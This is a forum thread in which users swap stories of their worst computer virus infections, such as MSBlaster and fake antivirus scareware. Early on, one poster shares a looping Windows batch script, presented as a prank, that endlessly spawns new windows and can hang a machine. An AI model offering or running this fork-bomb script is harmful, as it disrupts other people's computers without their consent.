What was the worst virus you ever had?

Vizy

Every time i got something major, i would just reformat.

However, i fool around with batch's a lot, and here is a REALLY simple oen that will annoy the hell out of anyone.

Code:
@echo off
:1
start
goto :1

bengal85

I have had to deal with several malware adware and Trojan horses not fun. Its all because people dont use virus protection right

chibicitiberiu

Don't know how it was called, but on my old PC formatted the hard drive in a weird way that it took me a week to fix it, and file names were something like this: ☻▲∑■.▒
Of course, the hard part was getting a windows 98 boot disk which wasn't easy, but once I got it the fix was pretty easy.

TFT

VIP Member
Only ever had one that messed me up requiring a re-install. Can't remember the name of it but it was one where it continually rebooted, as soon as it hit the desktop a popup informed me it was shutting down. :mad:

NaughtyMonkey

My ROC computer tech teacher said he got a virus one time that attacked all his .mp3's and changed them to some weird file type. I thought it was kind of funny lol.

magicman

VIP Member
Worst one I got caught out with was the MSBlaster worm (otherwise known as Lovesan). Every time you started the computer, it came up with the below message. After 60 seconds, your time was up and the pc shut down. :)

Windows_XP_Emergency_Shutdown.png

Dazzeerr

Worst one I got caught out with was the MSBlaster worm (otherwise known as Lovesan). Every time you started the computer, it came up with the below message. After 60 seconds, your time was up and the pc shut down. :)

Windows_XP_Emergency_Shutdown.png

Ouch! It's annoying enough when i mistakedly end a process that makes that shutdown thing come up :p

Think the worst i've had is one that slowed my computer down a huge amount over a week and then froze my mouse ever 5 seconds for 10 seconds... took like 10 minutes to launch anything Lol.

voyagerfan99

Master of Turning Things Off and Back On Again
Staff member
Never gotten one.

But at work, the most annoying are the Antivirus XP 2009 or something similar.

FairDoos

Never had a bad virus really just had the odd Trojan but lately ive had no virus's what so ever? :eek:

bigrich0086

worst one i seen was on a customers laptop that got a weird ass replicating virus. that destroyed her Hard drive sectors and had to replace the harddrive as all it did was click. and then reinstall windows.

it was insane how bad the clicking got each time i deleted the virus. and whe ni booted up the virus came back stronger and pissed off. and after 3 attemps the hd died and BSOD each boot.

NEW HD and OS fixed her problem

lawson_jl

I've never had a virus, got a little spyware once though, but nothing a quick scan couldn't take care off.

Gooberman

The worst thing that happened to me is that I got DDoSed sooo many times when i was playing this game... by a friend lol so i wasn't so pissed

voyagerfan99

Master of Turning Things Off and Back On Again
Staff member
Antivirus 2009 is amazingly annoying... ive removed it from like 5 computers in the last 2 weeks...

It's been Virus Week at the Kennedy Exchange - I removed Antivirus 2009 plus about 321 other infected objects with Malware Bytes yesterday - just on one machine too.

image0002wo8.jpg

Humveeluvr

I got this iworm/Trojan once and it created a new admin account, locked the task manager, removed the run command from the start button, could not access my computer, changed my desktop to and ad for free spyware removal, changed my home page and would not let me change it back, once in google every search I did redirected to the free spyware page, could not boot into safe mode or system restore it would just restart my computer, deleted avg and adaware and would not let me install from a disk any antivirus or spyware!

to make things worse this happended two days before I moved and I could not find my restore disk, and after a week with out my computer I finally went and bought Vista, reformat and there all better! two weeks later I found the disk but glad I went with Vista!
I lost so much stuff though, now the GF has a user account and if needed a program I will install it, and regular backups...

Cromewell

Administrator
Staff member
I got blaster once when I was trying to update a freshly reinstalled machine. It was just a minor annoyance really.

I got one from a friend at school who was sending me some project files (I should have known better, the guy was a big anime downloader), it screwed up the exe registy entry so that you couldn't run exes anymore. That was a bit more annoying but not real serious either.

I remeber one way back when, it was called Junkie and it travelled over the few networks that were around at the time as well as by floppy disk sharing. I don't remember what it did though.

Hdk20

Yes I do remember getting this virus vista 2009 or something like that. It was pretty bad had to do clean out my whole computer so I wiped it out with the cd that game with my CPU, so yeah. Keep em posts coming they are very interesting to hear to me.